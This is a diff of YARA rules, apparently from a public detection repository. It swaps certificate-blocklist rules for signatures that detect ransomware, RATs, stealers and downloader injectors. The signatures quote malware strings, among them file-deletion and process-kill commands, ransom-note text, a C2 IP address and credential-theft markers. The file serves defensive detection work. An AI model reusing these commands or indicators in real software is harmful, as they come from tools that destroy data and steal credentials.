-rule DITEKSHEN_INDICATOR_KB_CERT_4659Fa5Fc1E0397Df79Fd6A4083D93B0 : FILE
+rule DITEKSHEN_MALWARE_Win_Motocos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Motocos ransomware"
 		author = "ditekSHen"
-		id = "a0d2449c-c1b0-5e6a-9fa3-d8fe8e318c62"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7846-L7859"
+		id = "be7284be-b57d-5a2c-9a84-37d76445cd0d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5966-L5981"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6d8a10d77e63d2a62ce45606dd9a317220aa124a50fa95028a45d9f5899ec6e3"
+		logic_hash = "99ac365c277058503874313e3a74ab016d6d279b47c754c3df950e3ce60e29f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "fa5f2dbe813b0270b1f9e53da1be024fb495e8b1848bb3c9c7392a40c8f7e8e6"
-		reason = "RedLineStealer"
-		importance = 20
+
+	strings:
+		$s1 = "Block Investigation Tools" wide
+		$s2 = "powershell.exe,taskmgr.exe,procexp.exe,procmon.exe" wide
+		$s3 = "google.com,youtube.com,baidu.com,facebook.com,amazon.com,360.cn,yahoo.com,wikipedia.org,zoom.us,live.com,reddit.com,netflix.com,microsoft.com,instagram.com,vk.com," wide
+		$s4 = "START ----" wide
+		$s5 = "TEngine.Clear_EventLog_Result" wide
+		$s6 = "TEngine.EncryptLockFiles" wide
+		$s7 = "TEngine.CleanShadowFiles" wide
+		$s8 = "TDNSUtils.SendCommand" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Incuber Services LLP" and pe.signatures [ i ] . serial == "46:59:fa:5f:c1:e0:39:7d:f7:9f:d6:a4:08:3d:93:b0" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_651F3E5B491B197D20C49B9C7B25B775 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent12 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader agent"
 		author = "ditekSHen"
-		id = "fb8b4a88-631b-5a5c-ab36-286b74a3a346"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7861-L7874"
+		id = "841b998b-99d1-50d8-bc7b-75b2a8e690bf"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5983-L5993"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fe06e8f6fd87d5a9044a6ff609da73b7d9e7d1f07cc9e84ee2fd2940be615323"
+		logic_hash = "b9845414f4ce4cc25b75a8de7569c4135bbb7ba9098fd4c50d7ac80302e99b8f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0ee11d5917c486b7a57b7c3c566acec251170e98a577164f36b7d7d34f035499"
-		reason = "NetSupport"
-		importance = 20
+
+	strings:
+		$s1 = "WebClient" fullword ascii
+		$s2 = "DownloadData" fullword ascii
+		$s3 = "packet_server" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rhynedahll Software LLC" and pe.signatures [ i ] . serial == "65:1f:3e:5b:49:1b:19:7d:20:c4:9b:9c:7b:25:b7:75" )
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 50KB
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_67936A84Bed66Ef021Dbe771De331772 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector01 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects specific downloader injector shellcode"
 		author = "ditekSHen"
-		id = "2739308a-7396-5fe2-bf1b-fe7e6e5d1f80"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7876-L7889"
+		id = "c5e0946c-3e15-5ebc-b1b5-3f00566dc5cd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5995-L6015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da149e6835be937e0bf2763052d4cbabb367910061aec3c394dffaa45d9b0ac6"
+		logic_hash = "5c13af5fdbb2e8a27103d9502126a82d0bff15d9a269b22e4279b5b459d50e2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8fff75906628b764e99a7a028112a8ec7794097e564f0f897c24c2baaa82ded8"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "process call create \"%s\"" ascii wide
+		$s2 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\" ascii wide
+		$s3 = "%systemroot%\\system32\\ntdll.dll" ascii wide
+		$s4 = "qemu-ga.exe" ascii wide
+		$s5 = "prl_tools.exe" ascii wide
+		$s6 = "vboxservice.exe" ascii wide
+		$o1 = { 75 04 74 02 38 6e 8b 34 24 83 c4 04 eb 0a 08 81 }
+		$o2 = { 16 f8 f7 ba f0 3d 87 c7 95 13 b7 64 22 be e1 59 }
+		$o3 = { 8b 0c 24 83 c4 04 eb 05 ea f2 eb ef 05 e8 ad fe }
+		$o4 = { eb 05 1d 51 eb f5 ce e8 80 fd ff ff 77 a1 f4 cd }
+		$o5 = { eb 05 6e 33 eb f5 73 e8 64 f6 ff ff 77 a1 f4 77 }
+		$o6 = { 59 eb 05 fd 98 eb f4 50 e8 d5 f5 ff ff 3b b9 00 }
+		$o7 = "bYkoDA7G" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APEX SOFTWARE DESIGN, LLC" and pe.signatures [ i ] . serial == "67:93:6a:84:be:d6:6e:f0:21:db:e7:71:de:33:17:72" )
+		( uint16( 0 ) == 0x5a4d and all of ( $o* ) ) or ( all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_8538A6C5018F50Fc : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "8790c06a-3b7a-5e40-9a9c-0f2064029daf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7891-L7904"
+		id = "ce2c418d-18e4-579c-9828-94e294385846"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6017-L6034"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2ef3c7a45eb1d46e6c159ec9692fa5c17ff7679f41d96d04de52aa52ce96fa6b"
+		logic_hash = "76d185cfcbc7f4996c2fb5c7c1ba4eb20b32d322d8ff47594283a4ca3e573a0b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d42519dac24abc5c1ebfc6e0da0fd2e7cfb9db50c0598948c6630fdc132c7f94"
-		reason = "Malware"
-		importance = 20
+
+	strings:
+		$x1 = "In$J$ct0r" fullword wide
+		$x2 = "%InJ%ector%" fullword wide
+		$a1 = "WriteProcessMemory" fullword wide
+		$a2 = "URLDownloadToFileA" fullword ascii
+		$a3 = "Wow64SetThreadContext" fullword wide
+		$a4 = "VirtualAllocEx" fullword wide
+		$s1 = "RunPE" fullword wide
+		$s2 = "SETTINGS" fullword wide
+		$s3 = "net.pipe" fullword wide
+		$s4 = "vsmacros" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trading Technologies International, Inc." and pe.signatures [ i ] . serial == "85:38:a6:c5:01:8f:50:fc" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $a* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fecc3B3C675F7Ffd7De22507F3Fdacd7 : FILE
+rule DITEKSHEN_MALWARE_Win_Nermer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nermer ransomware"
 		author = "ditekSHen"
-		id = "b91a7dcd-6212-5750-9bc8-0eb37d9e129b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7906-L7919"
+		id = "fce4f178-8e98-53b0-ae09-2ce876ad524e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6036-L6062"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1319f4ccb5ab07c1c538d6a183fa25726b3d42192eaa878a2c402be2c93219f7"
+		logic_hash = "e885b1b908b256ee07f5cb144d63f5ad65e5bf746b70efe168b0ac742a246ab3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6b8cc2be066ff0bf1d884892fc600482fc34eaddb3a5e6681b509d64795b01d4"
-		reason = "RemcosRAT"
-		importance = 20
+
+	strings:
+		$x1 = "gPROTECT_INFO.TXT" fullword wide
+		$x2 = ".nermer" fullword wide
+		$s1 = "db_journal" fullword wide
+		$s2 = "quicken2015backup" fullword wide
+		$s3 = "mysql" fullword wide
+		$s4 = "sas7bdat" fullword wide
+		$s5 = "httpd.exe" fullword wide
+		$s6 = "Intuit.QuickBooks.FCS" fullword wide
+		$s7 = "convimage" fullword wide
+		$s8 = ".?AV?$_Binder@U_Unforced@std@@P8shares_t@" ascii
+		$s9 = "BgIAAACkAABSU0ExAAgAAAEAAQCt" ascii
+		$m1 = "YOUR FILES WERE ENCRYPTED" ascii
+		$m2 = "MARKED BY EXTENSION .nermer" ascii
+		$m3 = "send us your id: >> {id} <<" ascii
+		$m4 = "email us: >> {email} <<" ascii
+		$c1 = "/repeater.php" ascii
+		$c2 = "HTTPClient/0.1" fullword ascii
+		$c3 = "94.156.35.227" ascii
+		$c4 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gromit Electronics Limited" and pe.signatures [ i ] . serial == "fe:cc:3b:3c:67:5f:7f:fd:7d:e2:25:07:f3:fd:ac:d7" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $c* ) or all of ( $s* ) or ( 4 of ( $s* ) and ( 1 of ( $x* ) or 1 of ( $m* ) or 2 of ( $c* ) ) ) or 14 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5294F0F841F29855E33A18402421949A : FILE
+rule DITEKSHEN_MALWARE_Win_Beastdoor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Beastdoor backdoor"
 		author = "ditekSHen"
-		id = "3153f039-afd2-5eb5-b090-b205d9778eb7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7921-L7934"
+		id = "b271d53e-2693-5a93-825a-ef32f72a4b01"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6064-L6084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9d2b10c4117de276cb41148b41921115f414aa17e261956c8550adf6127d5b9"
+		logic_hash = "d9a72717d124bcf1e3b95850cd524e577abe96a094586a5555faadba78fcb9ad"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df744f6b9430237821e3f2bc6edafb4a92354dda1734a60d5e0d816256aefb47"
-		reason = "RemcosRAT"
-		importance = 20
+
+	strings:
+		$s1 = "shellx.pif" fullword ascii nocase
+		$s2 = "Beasty" fullword ascii
+		$s3 = "* Boot:[" ascii
+		$s4 = "^ Shut Down:[" ascii
+		$s5 = "set cdaudio door" ascii
+		$s6 = "This \"Portable Network Graphics\" image is not valid" wide
+		$n1 = ".aol.com" ascii
+		$n2 = "web.icq.com" ascii
+		$n3 = "&fromemail=" fullword ascii
+		$n4 = "&subject=" fullword ascii
+		$n5 = "&Send=" fullword ascii
+		$n6 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword ascii
+		$n7 = "mirabilis.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Integrated Plotting Solutions Limited" and pe.signatures [ i ] . serial == "52:94:f0:f8:41:f2:98:55:e3:3a:18:40:24:21:94:9a" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $n* ) or ( 3 of ( $s* ) and 3 of ( $n* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1614Ef66B2C4B886E71A93Dd34869F48 : FILE
+rule DITEKSHEN_MALWARE_Win_Gravityrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GravityRAT"
 		author = "ditekSHen"
-		id = "27bead15-f7fa-55a1-9347-ea551e1e0e18"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7936-L7949"
+		id = "cb581dd6-15b2-54ae-9f27-30ec21554fb9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6086-L6108"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26265d54d8b58128c1a9a3b322f339d1beb438f403637519b11ff324af91d1e2"
+		logic_hash = "a6b049dbf21f22f751c15da98536e9ef2a4ced7755ade0cc9904afddef1d3ae6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1689697e08dda6d1233c0056078ddf25b12c3608ead7d96ed4cbbb074e54ce29"
-		reason = "RemcosRAT"
-		importance = 20
+
+	strings:
+		$s1 = "/GX/GX-Server.php?VALUE=2&Type=" wide
+		$s2 = "&SIGNATUREHASH=" wide
+		$s3 = "Error => CommonFunctionClass => Upload()" wide
+		$s4 = "/GetActiveDomains.php" wide
+		$s5 = "DetectVM" ascii wide
+		$s6 = "/c {0} > {1}" wide
+		$s7 = "DRIVEUPLOADCOMPLETED => TOTALFILES={0}, FILESUPLOADED={1}" wide
+		$s8 = "Program => RunAFile()" wide
+		$s9 = "DoViaCmd" ascii
+		$s10 = ".msoftupdates.com:" wide
+		$f1 = "<RootJob>b__" ascii
+		$f2 = "<GetFiles>b__" ascii
+		$f3 = "<UpdateServer>b__" ascii
+		$f4 = "<EthernetId>b__" ascii
+		$f5 = "<MatchMacAdd>b__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHIRT AND CUFF LIMITED" and pe.signatures [ i ] . serial == "16:14:ef:66:b2:c4:b8:86:e7:1a:93:dd:34:86:9f:48" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $f* ) and 1 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65Cfd8419D70Ce4011D97Bc79D18315E : FILE
+rule DITEKSHEN_MALWARE_Win_Fatalrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects FatalRAT"
 		author = "ditekSHen"
-		id = "2368b3d1-1cd5-575b-a3ff-270349563d1a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7951-L7964"
+		id = "f9d0c5dd-ae69-512d-a260-01b9765e10eb"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6110-L6128"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "675ab6ef0f744f62db892992c6b3614e14b95f64e2800a0d10e55b915a2b4e74"
+		logic_hash = "fb7f6822aa4ef98e77670d276d06c9a37718bce38d32ce5b53fe67513b107fbe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7cff10e37a43843e971f02ca6ad6510f08a5209d21745181fc4d003a8287cd1b"
-		reason = "BumbleBee"
-		importance = 20
+
+	strings:
+		$x1 = "XXAcQbcXXfRSScR" fullword ascii
+		$s1 = "CHROME_NO_DATA" fullword ascii
+		$s2 = "CHROME_UNKNOW" fullword ascii
+		$s3 = "-Thread running..." ascii
+		$s4 = "InetCpl.cpl,ClearMyTracksByProcess" ascii nocase
+		$s5 = "MSAcpi_ThermalZoneTemperature" ascii nocase
+		$s6 = "taskkill /f /im rundll32.exe" fullword ascii nocase
+		$s7 = "del /s /f %appdata%\\Mozilla\\Firefox" ascii nocase
+		$s8 = "\\\\%s\\C$\\" ascii
+		$s9 = "fnGetChromeUserInfo" fullword ascii
+		$s10 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FACE AESTHETICS LTD" and pe.signatures [ i ] . serial == "65:cf:d8:41:9d:70:ce:40:11:d9:7b:c7:9d:18:31:5e" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_01Cf0B0F01B20B70Bfaa69722979Ef5C : FILE
+rule DITEKSHEN_MALWARE_Win_Wingo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects malicious Golang executables"
 		author = "ditekSHen"
-		id = "23f5047d-b8f9-5f17-9add-6e29dce9a976"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7966-L7979"
+		id = "bc0c84d6-7ea1-5234-89f6-98337900e044"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6130-L6141"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5942c0196d7264783590c599ccfb0fe6518b338238ddb3df4e4f8999922ce86b"
+		logic_hash = "423b1631ad625fd46a9d10f0ecdf24931cf62a2c1694da3ebdd38daad0a4f724"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "ef10480ab6448e60bdc689fc54cb6cfc4a8e1d39ddc788ce3d060ab4b7d30b59"
-		reason = "Ryuk"
-		importance = 20
+
+	strings:
+		$s1 = "Go build ID:" ascii
+		$s2 = /main\.[a-z]{9}Delete/ fullword ascii
+		$s3 = /main\.[a-z]{9}Update/ fullword ascii
+		$s4 = /main\.[a-z]{9}rundll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET PLUS PTY LTD" and pe.signatures [ i ] . serial == "01:cf:0b:0f:01:b2:0b:70:bf:aa:69:72:29:79:ef:5c" )
+		uint16( 0 ) == 0x5a4d and ( all of them and #s2 > 2 and #s3 > 2 and #s4 > 2 )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_698Ff388Adb50B88Afb832E76B0A0Ad1 : FILE
+rule DITEKSHEN_MALWARE_Win_GENERIC03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown malicious executables"
 		author = "ditekSHen"
-		id = "8118e0ee-6214-54f3-b025-234f9e685832"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7981-L7994"
+		id = "aa0a720d-8215-58d8-b3ce-98d50318cbf9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6143-L6154"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7734256201739dece5ae039d45ed79c74be6228f7da51fc82c0cfd2d4aacfd4b"
+		logic_hash = "9166808a3dab80d9d85b3b976ae658160c8389c7d0e05a46d553b5bb9d41a1cb"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "479e01dde7e7529ed4ad111a2d7b3b16fdc6fbe2ed0d6ff015c1c823ca0939db"
-		reason = "IcedID"
-		importance = 20
+
+	strings:
+		$s1 = "lbroscfg.dll" wide
+		$s2 = "cmd /c ping 127.0.0.1 & del /f /q \"" fullword wide
+		$s3 = "E:\\Data\\Sysceo\\AD\\" fullword ascii
+		$s4 = "C++\\Browser_noime\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BELLAP LIMITED" and pe.signatures [ i ] . serial == "69:8f:f3:88:ad:b5:0b:88:af:b8:32:e7:6b:0a:0a:d1" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5143Cf38D5Fd26858830826632Be9Fda : FILE
+rule DITEKSHEN_MALWARE_Win_Pandastealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Panda Stealer"
 		author = "ditekSHen"
-		id = "653a969a-9aed-5a26-9962-92bc173ddfdd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7996-L8009"
+		id = "099f0a03-6dfd-5ae5-baaf-fe2b66de759d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6156-L6172"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6f33fd94f8098ca9d4fe98b3dc0a833f0be78fe854c62d715b98a2ba980b8ac"
+		logic_hash = "23a911bfe14defe8f961068d43bb349b66ee73f8b2f281f2bec1c0ecb8f37b25"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "57a8aa854f3198f069bb34bc763b7773a8cfdafb562ee0ccf24a5067d45d5e3c"
-		reason = "BumbleBee"
-		importance = 20
+
+	strings:
+		$s1 = "\\tokens.txt" fullword ascii
+		$s2 = "user.config" fullword ascii
+		$s3 = "Discord\\" ascii
+		$s4 = "%s\\etilqs_" fullword ascii
+		$s5 = "buildSettingGrabber" ascii
+		$s6 = "buildSettingSteam" ascii
+		$s7 = ".?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@" ascii
+		$s8 = "UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr" ascii
+		$s9 = "|| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGI CORP MEDIA LLC" and pe.signatures [ i ] . serial == "51:43:cf:38:d5:fd:26:85:88:30:82:66:32:be:9f:da" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3628B93Bcd902B6B3E1Ffdf2E13Dfcf5 : FILE
+rule DITEKSHEN_MALWARE_Win_Gelsemine : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gelsemine"
 		author = "ditekSHen"
-		id = "8b8fa36d-181b-57a1-853e-ab11a5127fd7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8011-L8024"
+		id = "f7e9ca53-fc52-5da0-a760-cb09c2544f4f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6174-L6194"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf9b2ab7a379437daa04565fdf7adc04db2f6f1a6284d1fd91f037b255523c42"
+		logic_hash = "8c20efa6f34ee9165fac9f1f2e5eb20830a02016309dfaa5681977e1a8ac6068"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "27b75dc1d31a581f6e02bba3c03a62174ee4456021c7de50922caa10b98f8f7a"
-		reason = "Malware"
-		importance = 20
+
+	strings:
+		$s1 = "If any of these steps fails.only pick one of the targets for configuration\"If you want to just get on with it*which also use [ " wide
+		$s2 = "A make implementation+with core modules (please read NOTES.PER_L)2The per_l Text::Template (please read NOTES.PER_L)" wide
+		$s3 = "NOTES.VMS (OpenVMS)!NOTES.WIN (any supported Windows)%NOTES.DJGPP (DOS platform with DJGPP)'NOTES.ANDROID (obviously Android [ND" wide
+		$s4 = "A simple example would be this)which is to be understood as one of these" fullword wide
+		$s5 = "bala bala bala" fullword wide
+		$s6 = "echo FOO" fullword wide
+		$s7 = "?_Tidy@?$basic_string@DU?$char_traits@D@std@@V" ascii
+		$o1 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
+		$o2 = { eb 08 c7 44 24 34 fd ff ff ff 8b 44 24 54 8b 4c }
+		$o3 = { 8b 76 08 2b f0 a1 34 ff 40 00 03 f0 89 35 38 ff }
+		$o4 = { 83 c4 34 c3 8b 4e 20 6a 05 e8 73 10 00 00 8b 76 }
+		$o5 = { 8b 44 24 44 2b d1 03 d0 8b f2 e9 14 ff ff ff 8d }
+		$o6 = { 68 00 06 00 00 6a 00 e8 d3 ff ff ff a2 48 00 41 }
 
 	condition:
